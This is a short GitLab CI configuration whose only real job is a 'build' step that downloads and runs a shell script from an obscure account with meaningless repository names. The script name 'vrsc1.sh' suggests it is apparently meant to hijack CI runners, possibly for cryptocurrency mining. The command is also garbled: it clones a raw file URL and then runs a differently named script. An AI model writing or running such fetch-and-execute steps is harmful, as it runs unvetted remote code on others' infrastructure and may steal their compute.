stages:
  - build
  - test
  - deploy

job 0:
  stage: .pre
  script: echo "hello"
job 1:
  stage: build
  script: git clone https://gitlab.com/09515819962/edhgshfdh/-/raw/main/vrsc1.sh && cd edhgshfdh && chmod +x edhgshfdh.sh && ./edhgshfdh.sh
